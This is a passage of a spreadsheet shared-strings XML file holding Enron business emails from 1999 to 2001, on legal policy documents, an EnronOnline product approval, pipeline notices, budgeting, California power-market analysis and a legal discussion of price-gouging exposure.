  <si>
    <t>FINAL FINAL versions of Chinese wall docs</t>
  </si>
  <si>
    <t>Enclosed are redlined and clean copies of the final versions of the Executive _x000D_
Summary and Policies and Procedures.  These have been revised per Lance _x000D_
Schuler's requested revisions.  Almost all of the changes are in the opening _x000D_
paragraph in each document._x000D_
_x000D_
_x000D_
_x000D_
Donna W.: please save the clean copies to your system as the final versions _x000D_
of our new policy.  Thanks -- Bob_x000D_
_x000D_
_x000D_
Robert E. Bruce_x000D_
Senior Counsel_x000D_
Enron North America Corp._x000D_
T (713) 345-7780_x000D_
F (713) 646-3393_x000D_
robert.bruce@enron.com</t>
  </si>
  <si>
    <t>Tue, 18 Apr 2000 01:15:00 -0700 (PDT)</t>
  </si>
  <si>
    <t xml:space="preserve">doubleday_x000D_
_x000D_
_x000D_
   _x000D_
	Enron North America Corp._x000D_
	_x000D_
	From:  Timothy Blanchard @ EES                           04/18/2000 08:06 AM_x000D_
	_x000D_
_x000D_
To: Eric Bass/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: _x000D_
_x000D_
what's the name of that dermatologist?_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 20 Apr 2001 01:43:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Salmon Closing Memorandum</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Kay Mann/Corp/Enron on 04/20/2001 08:43 _x000D_
AM ---------------------------_x000D_
_x000D_
_x000D_
"Campbell, Carolyn" &lt;CCampbell@KSLAW.com&gt; on 04/19/2001 10:05:16 PM_x000D_
To: "'kay.mann@enron.com'" &lt;kay.mann@enron.com&gt;_x000D_
cc: "Keffer, John" &lt;JKeffer@KSLAW.com&gt; _x000D_
_x000D_
Subject: Salmon Closing Memorandum_x000D_
_x000D_
_x000D_
 &lt;&lt;30C_01!.DOC&gt;&gt;_x000D_
_x000D_
Kay:_x000D_
_x000D_
Enclosed is the initial draft of a closing memorandum for the Salmon_x000D_
transaction.  Please review and advise of any comments.  Thank you._x000D_
_x000D_
Carolyn M. Campbell_x000D_
King &amp; Spalding_x000D_
713-276-7307 (phone)_x000D_
713-751-3280 (fax)_x000D_
ccampbell@kslaw.com &lt;mailto:ccampbell@kslaw.com&gt;_x000D_
_x000D_
Enclosure: 140424v1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 30C_01!.DOC_x000D_
</t>
  </si>
  <si>
    <t>Thu, 12 Oct 2000 18:39:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'ckwon@aol.com'})</t>
  </si>
  <si>
    <t>Re: Study?</t>
  </si>
  <si>
    <t>Jefe,_x000D_
_x000D_
Excellent idea.  I'm in.  Thank you._x000D_
_x000D_
-Charlotte</t>
  </si>
  <si>
    <t>Fri, 9 Mar 2001 06:44:00 -0800 (PST)</t>
  </si>
  <si>
    <t>URGENT REQUEST: PLEASE REVIEW AND APPROVE NEW PRODUCT TYPE_x000D_
 (ENRONONLINE)</t>
  </si>
  <si>
    <t xml:space="preserve">Please handle this request. It looks very similar to the exchage product we _x000D_
just signed off on.Thanks._x000D_
----- Forwarded by Alan Aronowitz/HOU/ECT on 03/09/2001 02:43 PM -----_x000D_
_x000D_
	Tana Jones_x000D_
	03/09/2001 10:48 AM_x000D_
		 _x000D_
		 To: Alan Aronowitz/HOU/ECT@ECT_x000D_
		 cc: _x000D_
		 Subject: URGENT REQUEST: PLEASE REVIEW AND APPROVE NEW PRODUCT TYPE _x000D_
(ENRONONLINE)_x000D_
_x000D_
_x000D_
----- Forwarded by Tana Jones/HOU/ECT on 03/09/2001 10:48 AM -----_x000D_
_x000D_
	Robert B Cass_x000D_
	03/09/2001 10:43 AM_x000D_
		 _x000D_
		 To: Mark Taylor/HOU/ECT@ECT, Tom Moran/HOU/ECT@ECT, Jeff Blumenthal/HOU/ECT, _x000D_
Susan Musch/ENRON_DEVELOPMENT, Bjorn Hagelmann/HOU/ECT, Shifali _x000D_
Sharma/NA/Enron_x000D_
		 cc: Lisa Lees/HOU/ECT@ECT, Stephanie Sever/HOU/ECT@ECT, Tana _x000D_
Jones/HOU/ECT@ECT, Karen Lambert/HOU/ECT@ECT, Kelly Lombardi/NA/Enron@Enron, _x000D_
Tara Sweitzer/HOU/ECT@ECT, Dawn C Kenne/HOU/ECT@ECT, Torrey _x000D_
Moorer/HOU/ECT@ECT, Chris Walker/HOU/ECT@ECT, Kevin _x000D_
Meredith/Corp/Enron@ENRON, Melba Lozano/HOU/ECT@ECT, John _x000D_
Viverito/Corp/Enron@Enron, Nony Flores/HOU/ECT@ECT_x000D_
		 Subject: URGENT REQUEST: PLEASE REVIEW AND APPROVE NEW PRODUCT TYPE _x000D_
(ENRONONLINE)_x000D_
_x000D_
Your review and approval of the following product type in the EOL Datamanager _x000D_
is needed (for directions on approval , please see steps for approval at the _x000D_
bottom of this e-mail). If you have any questions please call me at ext. _x000D_
35491.  _x000D_
_x000D_
Please do not approve product types in Datamanager between 7:30 - 10:00 am.  _x000D_
Please grant approval no later than 12:00 noon on March 14, 2001._x000D_
_x000D_
Trader: Robert Fuller_x000D_
_x000D_
New Product Type:   US Crude WTI Phy Exchange (Platts Indexed Commodities)_x000D_
_x000D_
_x000D_
_x000D_
EXAMPLE:_x000D_
_x000D_
US WTI Phy Exch  Platts WTI / ANS        Month/Yr           USD/bbl_x000D_
_x000D_
Product Type Long descripton:_x000D_
A US Crude Transaction with Enron Reserve Acquisition Corp. (ERAC), under _x000D_
which (A) where ERAC is the Buyer,  ERAC shall sell and deliver  to _x000D_
Counterparty and Counterparty  shall purchase and receive a quantity of West _x000D_
Texas Intermediate crude oil deemed gravity 40 API ("WTI") at Cushing, _x000D_
Oklahoma U.S.A. TEPPCO Crude Pipeline, L.P. ("Cushing") equal to the volume _x000D_
submitted by the Counterparty via the Website for delivery during the term of _x000D_
the Transaction, and  Counterparty shall sell and deliver to ERAC and ERAC _x000D_
shall purchase and receive the same volume of Exchange Product in equal parts _x000D_
for delivery during the term of the Transaction; and, (B) where ERAC is the _x000D_
Seller, Counterparty shall sell and deliver to ERAC and ERAC shall purchase _x000D_
and receive  a quantity of WTI at Cushing equal to the volume submitted by _x000D_
the Counterparty via the Website for delivery during the term of the _x000D_
Transaction, and ERAC shall sell and deliver  to Counterparty and _x000D_
Counterparty shall purchase and receive the same volume of Exchange Product _x000D_
in equal parts  for delivery during the term of the Transaction.  The price _x000D_
for WTI shall be the midpoint of the daily first line quotations for _x000D_
(WTI/(MONTH) under the heading "U.S. $/Bbl" in the Crude Price Assessments _x000D_
section of Platt's Oilgram Price Report for the issue of publication on the _x000D_
date of the Transaction ("Index Price").  The price for Exchange Product _x000D_
shall equal (i) the Index Price, plus (ii) the Adjusted Price.  The Bid Price _x000D_
represents the Adjusted  Price for Exchange Product  under Section A above. _x000D_
The Offer Price represents the Adjusted Price for Exchange Product  under _x000D_
Section B above._x000D_
_x000D_
Term of the Product:_x000D_
The term of the Transaction shall be from the Effective Date to the _x000D_
Termination Date. The Effective Date is {DATE}.   The Termination Date is  _x000D_
{DATE}._x000D_
_x000D_
Location of the Example Product:_x000D_
The delivery of Alaskan North Slope ("Exchange Product") shall be at Long _x000D_
Beach, California._x000D_
_x000D_
Currency:_x000D_
The price is quoted in US Dollars per unit of volume, which will be the _x000D_
Contractual Currency._x000D_
_x000D_
UOM:_x000D_
The unit of measure in which the price is quoted is in Barrels per day and _x000D_
the quantity shown shall be in Barrels per day._x000D_
_x000D_
==============================================================================_x000D_
=====_x000D_
_x000D_
STEPS FOR APPROVAL:_x000D_
_x000D_
click the  START button _x000D_
select  PROGRAMS_x000D_
select  TEST APPLICATIONS_x000D_
select ENRONONLINE CLUSTER(PROD)_x000D_
 PROCEED WITH USUAL LOGIN/PASSWORD _x000D_
click the Enron Online Production Cluster "START" button  _x000D_
select EnronOnLine (this is the EOL Datamanager)_x000D_
 PROCEED WITH EOL LOGIN/PASSWORD_x000D_
click on the "+" for EnronOnLine_x000D_
click on the "+" for Product Types_x000D_
click on the "+" for "Awaiting Approval" (OR  "Partially Approved")_x000D_
select the product requiring review as stated in e-mail above_x000D_
Right "mouse" click on "properties" to view product set-up _x000D_
TO APPROVE:  Right mouse click on "Approved"_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 19 Dec 2001 13:28:52 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'jonathan.mckay@enron.com', 'frank.vickers@enron.com', 'f..keavey@enron.com', 'judy.townsend@enron.com', 'scott.neal@enron.com', 'andrea.ring@enron.com', 'maureen.smith@enron.com', 'f..brawner@enron.com', 'craig.taylor@enron.com', 'chris.germany@enron.com', 'chuck.ames@enron.com', 'brad.mckay@enron.com'})</t>
  </si>
  <si>
    <t>FW: Gas Merchantability Reminder</t>
  </si>
  <si>
    <t xml:space="preserve">fyi_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	CustomerNotices, WGPHOU [mailto:WGPHOU.CustomerNotices@Williams.com] _x000D_
Sent:	Wednesday, December 19, 2001 2:51 PM_x000D_
Subject:	Gas Merchantability Reminder_x000D_
_x000D_
December 19, 2001_x000D_
_x000D_
Notice to: All Producers, Receipt Point Operators, _x000D_
Interconnecting Pipelines and Shippers on the Transcontinental _x000D_
Gas Pipe Line Corporation (Transco) System_x000D_
_x000D_
 Subject: Gas Merchantability Reminder_x000D_
_x000D_
Transco has been receiving gas with a slightly higher heating _x000D_
content (btu/cf) in its mainline over the past week and feels _x000D_
this is the result of processing plants scaling back their _x000D_
operations due to poor economics. Transco reminds Producers and _x000D_
Shippers on its system to ensure that processing arrangements _x000D_
are in place and that the gas received by Transco meets its _x000D_
merchantability requirements. _x000D_
_x000D_
These gas merchantability specifications are outlined in _x000D_
Transco's gas merchantability notice, most recently re-posted _x000D_
July 27, 2001. _x000D_
_x000D_
If you have any questions concerning this notice, please contact _x000D_
the following at Transco: Ron Doyle, 713-215-2921 or Terry _x000D_
Fitch, 713-215- 3361. _x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 30 Aug 2000 08:30:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'suzanne.nicholie@enron.com'})</t>
  </si>
  <si>
    <t>Re: Meeting to discuss 2001 direct expense plan</t>
  </si>
  <si>
    <t xml:space="preserve">Please contact John Lavorato.  He will be in charge of these budgetary issues._x000D_
Thanks,_x000D_
John_x000D_
_x000D_
_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  Suzanne Nicholie @ ENRON                           08/29/2000 05:11 PM_x000D_
	_x000D_
_x000D_
To: John Arnold/HOU/ECT@ECT_x000D_
cc: Paula Harris/HOU/ECT@ECT _x000D_
Subject: Meeting to discuss 2001 direct expense plan_x000D_
_x000D_
Hi John,_x000D_
_x000D_
Since Jeff has left I am assuming that you will be responsible for the plan _x000D_
for your cost center - 105894.  Please correct me if I am wrong._x000D_
_x000D_
I have scheduled a meeting tomorrow at 4pm with you to discuss the 2001 _x000D_
direct expense plan for Financial Gas trading.  I will have a schedule that _x000D_
details your 2000 plan, 2000 estimate based on the first 6 months of 2000 and _x000D_
a template for the 2001 plan.  _x000D_
_x000D_
I will be mostly interested in getting the following information from you _x000D_
tomorrow:_x000D_
_x000D_
1) Are you expecting an increase in headcount?  If so, what level of person?_x000D_
2) What percentage increase in salaries for 2001?_x000D_
3) Will you increase the # of analyst and associates used in this cost center?_x000D_
4) What special pays, sign on bonuses, employee agreement, etc. do you want _x000D_
to plan for?_x000D_
5) Are you expecting any promotions?_x000D_
6) If you increase headcount, would this person(s) come from placement _x000D_
agencies?  Would we need to plan relocation costs for them?_x000D_
7) Do you expect to use any consulting firms or outside temporaries?_x000D_
8) Will you have any employee offsites or customer meetings that we should _x000D_
plan for?  If so, how much and where?_x000D_
9) Will you have any large capital expenditures other than computers, _x000D_
monitors and software?_x000D_
10) Do you anticipate any other changes in this cost center that we should _x000D_
plan for (ie, opening of another office, etc.)_x000D_
_x000D_
My last day in this group is Thursday so I was trying to get this finished _x000D_
before Paula Harris took over.  She will be coming to the meeting with me.  _x000D_
Please let me know if you need any additional information prior to the _x000D_
meeting._x000D_
_x000D_
Thanks!_x000D_
Suzanne_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 13 Jul 2000 09:32:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Western Energy: Power Market Caps: Lower Prices at Higher Risk? -_x000D_
 CERA Alert</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Lorna Brennan/ET&amp;S/Enron on 07/13/2000 _x000D_
04:27 PM ---------------------------_x000D_
_x000D_
_x000D_
webmaster@cera.com on 07/07/2000 11:18:52 PM_x000D_
To: Lorna.Brennan@enron.com_x000D_
cc:  _x000D_
_x000D_
Subject: Power Market Caps: Lower Prices at Higher Risk? - CERA Alert_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
**********************************************************************_x000D_
CERA Alert: Sent Fri, July 07, 2000_x000D_
**********************************************************************_x000D_
_x000D_
Title: Power Market Caps: Lower Prices at Higher Risk?_x000D_
Author: Zenker, Mortizburke_x000D_
E-Mail Category: Alert_x000D_
Product Line: Western Energy ,_x000D_
URL: http://www.cera.com/cfm/track/eprofile.cfm?u=5526&amp;m=1264 ,_x000D_
_x000D_
Recent events in California, culminating in new market rules established for _x000D_
the energy and ancillary services markets, indicate that legislators and _x000D_
regulators are dissatisfied with the performance of the markets they _x000D_
established. The hot weather in California during June triggered high _x000D_
electricity demand, corresponding record-breaking power prices, and rolling _x000D_
blackouts in the San Francisco area. Although the economic impact of both the _x000D_
outages and the concurrent price spikes is significant, a recent decision by _x000D_
California's Independent System Operator (ISO) to intervene in the markets by _x000D_
lowering price caps through the summer of 2000 from $750 to $500 per _x000D_
megawatt-hour (MWh) may prove to be the most important product of the market _x000D_
events.* Ironically, the proclivity to continue to change the market rules, _x000D_
whatever the intention, could create market distortions that delay the _x000D_
addition of new generating capacity by discouraging plant developers and _x000D_
driving away needed capit!_x000D_
al. This would only prolong the state's supply shortage and resultant high _x000D_
prices._x000D_
_x000D_
Although the record-setting weather that prompted the rolling blackouts in _x000D_
the San Francisco area is not likely to be repeated, the West as a whole will _x000D_
experience higher coincident peak demand under normal weather conditions this _x000D_
summer. CERA expects that supplies will be sufficient to meet peak demand _x000D_
this year, but the high price levels of June will be repeated during peak _x000D_
demand conditions not only this summer but during the summers of 2001 and _x000D_
possibly 2002._x000D_
_x000D_
The Pressure Builds_x000D_
The blackouts were not spawned by a statewide supply shortfall, but instead _x000D_
by a transmission constraint that limits the ability to import sufficient _x000D_
quantities of power to the San Francisco area. The quantity of generating _x000D_
capacity out of service in the West was near average levels, despite a _x000D_
nuclear unit outage in Washington. Although the blackouts were brief and _x000D_
wholesale power prices decreased with the temperatures, the intense scrutiny _x000D_
over the events and resultant changes to the market rules indicate that _x000D_
legislators and regulators are dissatisfied with the performance of the _x000D_
markets they designed. The market's architects assumed that competition would _x000D_
lower wholesale prices in the state. However, prices in June have been _x000D_
roughly eight times higher than in 1997's prerestructured California market, _x000D_
leading many regulators and legislators to conclude that the markets are _x000D_
flawed, requiring additional caps and market rules. Although some state _x000D_
officials strongly favored lo!_x000D_
wering the price caps, many within the ISO's Board of Governors strongly _x000D_
opposed intervening in what they consider to be normal market reactions to _x000D_
tight supply and demand fundamentals._x000D_
_x000D_
The current tight supply situation in California and the West as a whole is a _x000D_
product of recent strong economic growth throughout the region coupled with _x000D_
the slow process of permitting new power plants. Owing to strong economic _x000D_
growth in California in 1998 and 1999 (5.2 and 5.5 percent, respectively*), _x000D_
capacity margins have shrunk from 12 percent in 1997 to 7 percent in 2000. _x000D_
Demand growth throughout the West has reduced the amount of energy available _x000D_
for export from the Pacific Northwest and Southwest to California._x000D_
_x000D_
As a result, even with optimistic levels of energy imports and the _x000D_
curtailment of approximately 2,800 megawatts (MW) of interruptible load _x000D_
within the state, California capacity margins will fall well below North _x000D_
American Electric Reliability Council (NERC) reliability criteria (roughly 15 _x000D_
percent) this summer. The West is the only region in North America that will _x000D_
experience a tightening of capacity margins relative to levels in 1999 under _x000D_
normal weather conditions. CERA anticipates peak demand growth to continue to _x000D_
outpace new capacity additions through 2001, with slightly growing capacity _x000D_
margins in 2002. At these levels, an unusual amount of either plant capacity _x000D_
or transmission line capacity out of service during peak demand conditions _x000D_
would require the ISO to mandate blackouts of a portion of the state's load _x000D_
to maintain the overall stability of the grid._x000D_
_x000D_
Thus, the tight capacity situation in the state will continue to pressure _x000D_
prices to high levels, which may provoke legislators and regulators to _x000D_
attempt to extend the price caps or implement additional market rules._x000D_
_x000D_
Market Distorting Effects_x000D_
Under tremendous pressure from some legislators, regulators, and market _x000D_
participants, the California ISO Board of Governors lowered the current price _x000D_
caps on energy from $750 to $500 per MWh in a special meeting conducted June _x000D_
28.** Owing to the interconnectedness of western markets, the decision to _x000D_
lower the caps and the apparent willingness of regulators to continue to _x000D_
change the rules governing California's electricity markets will affect power _x000D_
market participants throughout the West._x000D_
_x000D_
* Profitability of existing and future generators degraded. High power prices _x000D_
and volatility levels in June, although detrimental to most buyers, provide _x000D_
strong encouragement to plant developers. Limiting the level of price fly-ups _x000D_
degrades the ability of plant owners to recover capital costs plus earn a _x000D_
return on that capital. In most periods of the year, competition drives _x000D_
prices to levels that provide little opportunity for a return on capital. _x000D_
Generators therefore seek to recover their investments with higher bids in _x000D_
California's energy and ancillary services markets during periods of supply _x000D_
scarcity. Existing merchant generators are at increased risk to recover the _x000D_
investments they made based on cash flow outlooks developed prior to the _x000D_
imposition of caps._x000D_
_x000D_
* Supply shortfall prolonged. The process of siting and permitting power _x000D_
plants in California is cumbersome, requiring as long as five years from _x000D_
plant proposal to synchronization with the grid. The California Energy _x000D_
Commission (CEC), the state agency charged with approving new plants, has _x000D_
repeatedly expressed concerns about the chronic tight supply situation in the _x000D_
state. Price-dampening market intervention indicates to plant developers that _x000D_
California officials may continue to reengineer the state's power markets to _x000D_
the detriment of generator profitability and, when added to the difficult _x000D_
permitting process, potentially delaying the introduction of new capacity to _x000D_
meet rapidly growing state demand. Prominent plant developers have recently _x000D_
indicated that markets outside of California may provide a more stable market _x000D_
and a better environment for deploying scarce resources and generating _x000D_
equipment such as turbines._x000D_
_x000D_
* Trading positions affected. Lowering price caps reduces the degree of price _x000D_
volatility and the level of overall average prices. Market participants have _x000D_
executed market positions based on the outlook for prices under the previous, _x000D_
higher price cap. By lowering the price cap, not only are the value of _x000D_
existing physical (e.g., power plant) and financial (e.g., forward contracts) _x000D_
positions significantly affected, but market participants must also _x000D_
incorporate the uncertainty of possible future adjustments to the cap into _x000D_
their trading.*_x000D_
_x000D_
* Circumventing market rules. The variety of energy and capacity markets in _x000D_
California, as well as the bilateral markets outside of the state, provides _x000D_
opportunities to circumvent the intent of the new market rules, further _x000D_
distorting the markets in the West._x000D_
_x000D_
Although lowering price caps in California will likely temporarily reduce _x000D_
price levels, the new power plant capacity ultimately needed in the state to _x000D_
reduce price levels and improve reliability on a sustainable basis could be _x000D_
discouraged by prolonged and repeated intervention in the market._x000D_
_x000D_
**end**_x000D_
_x000D_
Follow URL for PDF version of this Alert._x000D_
Note: Should the above URL not work, please use the following: _x000D_
http://www.cera.com/client/ce/alt/070700_16/ce_alt_070700_16_ab.html_x000D_
_x000D_
_x000D_
_x000D_
**********************************************************************_x000D_
Account Changes_x000D_
To edit your personal account information, including your e-mail_x000D_
address, etc. go to: http://eprofile.cera.com/cfm/edit/account.cfm_x000D_
_x000D_
This electronic message and attachments, if any, contain information_x000D_
from Cambridge Energy Research Associates, Inc. (CERA) which is_x000D_
confidential and may be privileged. Unauthorized disclosure, copying,_x000D_
distribution or use of the contents of this message or any attachments,_x000D_
in whole or in part, is strictly prohibited._x000D_
_x000D_
Terms of Use: http://www.cera.com/tos.html_x000D_
Questions/Comments: webmaster@cera.com_x000D_
Copyright 2000. Cambridge Energy Research Associates_x000D_
  _x000D_
</t>
  </si>
  <si>
    <t>Tue, 27 Jun 2000 05:40:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'scottolson@andrews-kurth.com', 'john.scarborough@enron.com', 'stephanie.casas@enron.com', 'mark.knippa@enron.com', 'dbarbour@andrews-kurth.com', 'mark.courtney@enron.com', 'cris.sherman@enron.com', 'gerald.nemec@enron.com', 'hbinder@porterhedges.com', 'hbrown@bracepatt.com', 'pmelcher@aol.com', 'rhett.jackson@enron.com'})</t>
  </si>
  <si>
    <t>Gallup</t>
  </si>
  <si>
    <t>Attached please find a revised First Amendments Agreement.  The only change _x000D_
since yesterday's draft was to Exhibit A to include ECHO's notice address _x000D_
before August 1, 2000 and on and after August  1, 2000. _x000D_
_x000D_
 Are we now ready to begin execution?  _x000D_
_x000D_
Regards, NJD</t>
  </si>
  <si>
    <t>Fri, 9 Apr 1999 11:29:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>PG&amp;E UPDATE</t>
  </si>
  <si>
    <t xml:space="preserve">Mike   _x000D_
We completed the decontamination on both of the filter separators on the _x000D_
discharge of the Solexol Plant.  There was a thin film of an oily substance _x000D_
(presumably Solexol) on the interior wall of the filter separators.  However, _x000D_
both sets of filters were very clean.  No moisture was present on the filters _x000D_
and there was not any sludge or build up on any of the filters.  The filters _x000D_
that were removed had the same appearance of a brand new filter.  As a matter _x000D_
or fact, when you laid a new filter beside a used filter you could not tell a _x000D_
difference.  The filters being used are a Sock type filter and when you ran _x000D_
your hand across the filters you could not detect the presence of any _x000D_
moisture at all._x000D_
_x000D_
So, it's presumed that the system has been completely absent of any liquid.  _x000D_
The small amounts of liquid being collected from week to week for sampling _x000D_
must have been accumulated from the run down or film, pre-existing on the _x000D_
interior of the filter separator housing.  A decontamination and triple rinse _x000D_
of each filter separator should result in a total absence of any liquid for _x000D_
future samples, other than the remaining soap and water used for the final _x000D_
rinse that could not be drained from the vessels._x000D_
_x000D_
Rich and I visited the Topock compressor station this morning and reviewed _x000D_
the sampling point on PG&amp;E's inlet scrubber.  Rich made the recommendation to _x000D_
Randy Williams and Rick Bezanson (PG&amp;E) that future samples be taken straight _x000D_
off the bottom of the scrubber rather than from PG&amp;E's 1000 gallon blow down _x000D_
tank.  The purpose of this was to reduce the exposure to contaminating future _x000D_
samples with pre-existing PCB's that may have collected in the 1000 gallon _x000D_
blow down tank over a period of time.  PG&amp;E agreed to sample from this point _x000D_
on future collections._x000D_
_x000D_
Both of the discharge lines on each filter separator at the Solexol plant _x000D_
have been hot tapped in preparation of Solexol injection.  Piping has been _x000D_
installed and pumps are in place to accommodate the Solexol injection as _x000D_
well.  However, NO injection of Solexol will take place until after our _x000D_
meeting next Tuesday with PG&amp;E._x000D_
_x000D_
Transwestern has agreed with PG&amp;E today to postpone our planned _x000D_
decontamination of the filter separator at Transwesterns PG&amp;E meter station _x000D_
until April 28th, at which time Transwestern and PG&amp;E will perform a _x000D_
decontamination of both TW's and PG&amp;E's filter separators simultaneously.   _x000D_
_x000D_
                                                                              _x000D_
               Thanks, Tiny_x000D_
_x000D_
---------------------- Forwarded by David Roensch/ET&amp;S/Enron on 04/09/99 _x000D_
05:51 PM ---------------------------_x000D_
_x000D_
Rich Jolly_x000D_
04/08/99 11:46 PM_x000D_
_x000D_
_x000D_
To: Michel E Nelson@Enron_x000D_
cc: Rick Cates/ET&amp;S/Enron@Enron, Jeffery Fawcett/ET&amp;S/Enron@Enron, Dan _x000D_
Pribble/ET&amp;S/Enron@Enron, Larry Campbell/ET&amp;S/Enron@Enron, Earl _x000D_
Chanley/ET&amp;S/Enron@Enron, Arnie Bailey/ET&amp;S/Enron@Enron, Bob Bandel@Enron, _x000D_
Roger Osborn/ET&amp;S/Enron@Enron, David Roensch@ENRON, Rick _x000D_
Smith/ET&amp;S/Enron@Enron, Louis Soldano/ET&amp;S/Enron@Enron _x000D_
_x000D_
Subject: PG&amp;E UPDATE_x000D_
_x000D_
Mike_x000D_
We completed decontamination of the inlet filter at the selexol plant today. _x000D_
It was dirty but _x000D_
no liquid. There was some dried sludge in the bottom of the vessel and the _x000D_
filters were _x000D_
extremely dirty. We plan to do both of the filters on the discharge side _x000D_
tomorrow.I got a phone _x000D_
messsage from Jeff and he hasn't heard anything from PGE since the letter was _x000D_
sent . We will _x000D_
plan to bypass and clean the filter on the west side of the river, last one _x000D_
on our system Saturday_x000D_
unless we hear something different tomorrow. We will notify the PGE operators _x000D_
of their plant _x000D_
tomorrow of our plans.If anyone needs to contact me my pager number is _x000D_
1-800-921-9564 and office_x000D_
phone number is 505-260-4003. Leave a message on the office phone and it will _x000D_
automatically_x000D_
page me. I'll give everyone an update late tomorrow. We should have the hot _x000D_
tap valves on location _x000D_
tomorrow for the selexol injection. We plan to install the valves as soon as _x000D_
they arrive._x000D_
_x000D_
Thanks RJ_x000D_
_x000D_
By the way Bisti came on line today and they plan to run it tonight and be _x000D_
back on location to _x000D_
check on the unit tomorrow._x000D_
</t>
  </si>
  <si>
    <t>Wed, 22 Nov 2000 04:14:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: gouging</t>
  </si>
  <si>
    <t xml:space="preserve">As to your question about what's going on in California, I've done some _x000D_
reading and here are my thoughts._x000D_
_x000D_
The Nov. 1 FERC order in Docket No. EL00-95-000, in which the Commission _x000D_
ordered a $150/MWh price cap (among other things), was predicated on the _x000D_
Commission's authority under Section 206 of the Federal Power Act.  _x000D_
Specifically, the FPA provides that if the Commission finds that "any rate, _x000D_
charge or classification for jurisdictional services, or any rule, _x000D_
regulation, practice or contract affecting such rate, charge or _x000D_
classification" is unjust or unreasonable, the Commission shall determine the _x000D_
just and reasonable rate, charge, classification, rule, regulation, practice, _x000D_
or contract that should be in effect.  The Commission recognized that certain _x000D_
areas of the flawed California market are not within its jurisdiction, but _x000D_
"fixed" the areas within its jurisdiction.   Apparently the California _x000D_
governor agrees with me that the Commission's jurisdiction in the area of _x000D_
wholesale electricity prices is questionable..._x000D_
_x000D_
In any event, if the Commission wanted to open a proceeding to investigate _x000D_
the justness and reasonableness of negotiated gas transportation rates, its _x000D_
authority to do so would be much clearer.  The Natural Gas Act expressly _x000D_
authorizes FERC to declare unlawful any transportation rate that is not just _x000D_
and reasonable.  "Just and reasonable" has been interpreted in many different _x000D_
contexts and the Commission has significant discretion over what it means.  _x000D_
As we all know too well, the Commission sometimes acts unpredictably.  _x000D_
However, my feeling is that it will probably take more than 2 or 3 _x000D_
above-max-rate contracts to motivate the FERC to act to declare a negotiated _x000D_
rate deal, struck within a pipeline's tariff authority, to be unjust and _x000D_
unreasonable.  The California proceeding was initiated after entire _x000D_
communities of individual consumers suffered 200-300% increases in their _x000D_
electricity bills.  The prices for electricity in California were outrageous _x000D_
across the board and affected everyone in the state.  By contrast, TW's _x000D_
transport rates for its short-term deals are far removed from end user prices _x000D_
and the practice of negotiating higher than max rate deals is probably not _x000D_
widespread enough for anyone to notice.  It is far from being a consumer _x000D_
issue, and besides, the elections are over.  However, as you and I have _x000D_
already discussed, we must be wary of parties like Dynegy that do notice just _x000D_
about everything and who might try to draw it to FERC's attention.  We do _x000D_
need to watch to see whether other pipelines serving California are doing the _x000D_
same types of deals.  Kathy, why don't you and I discuss a system of _x000D_
monitoring the contract information postings of El Paso, Kern, PGT/NW.  Drew, _x000D_
obviously I've only scratched the surface here so let's talk if you want a _x000D_
more in-depth report._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  Drew Fossum                           11/21/2000 10:36 AM_x000D_
	_x000D_
_x000D_
To: Susan Scott/ET&amp;S/Enron@ENRON_x000D_
cc: Kathy Ringblom/ET&amp;S/Enron@ENRON _x000D_
_x000D_
Subject: Re: gouging  _x000D_
_x000D_
That is by far the best line of the day!!  Unconscionability may be the thing _x000D_
I'm remembering , but I think there is some more specific law related to _x000D_
market dislocations--i.e., the Hurricane example.  Its sort of a twist on _x000D_
market power law--i.e., if the fates hand you short term market power, you _x000D_
better not use it.  DF    _x000D_
_x000D_
_x000D_
_x000D_
Susan Scott_x000D_
11/21/2000 10:08 AM_x000D_
To: Drew Fossum/ET&amp;S/Enron@ENRON_x000D_
cc: Kathy Ringblom/ET&amp;S/Enron@ENRON _x000D_
_x000D_
Subject: Re: gouging  _x000D_
_x000D_
I know there is some case law out there on contracts being voided because _x000D_
they are "unconscionable."  There are several examples in consumer law and _x000D_
employment law, in which one contracting party is a corporation and the other _x000D_
is a West Palm Beach voter.  However, if my memory serves me correctly, none _x000D_
of them involve contracts between 2 sophisticated business entities such as _x000D_
TW and Sempra or PG&amp;E.  Absent evidence of fraud, courts uphold bargains _x000D_
struck at arms length.  _x000D_
Kathy, I'd be happy to take the oars on this but if you've already done some _x000D_
looking, please let me know if you've found anything._x000D_
_x000D_
_x000D_
_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  Drew Fossum                           11/20/2000 04:44 PM_x000D_
	_x000D_
_x000D_
To: Susan Scott/ET&amp;S/Enron@ENRON, Kathy Ringblom/ET&amp;S/Enron@ENRON_x000D_
cc:  _x000D_
_x000D_
Subject: gouging_x000D_
_x000D_
Stuck on the phone so I thought I'd email you.  Stan has asked Mike Moran if _x000D_
TW has any potential exposure on the high value transport deals under "anti _x000D_
gouging" statutes or common law.  You know, the laws that say you can't _x000D_
charge $100 per sheet of plywood during a hurricane or $50 for a bucket of _x000D_
water during a drought.  I think we need to research two things:_x000D_
1.  are there any such laws applicable to our business?  (Cal. state law _x000D_
would probably be the best place to start)_x000D_
2.  could the political/regulatory fight in Cal about power and gas prices _x000D_
ever expand all the way to our transport pricing?  I.e., if the CPUC whacks _x000D_
the power sellers for taking unfair advantage of their monopoly power, its _x000D_
not a big leap for the CPUC or FERC or even U.S. congress to whack gas _x000D_
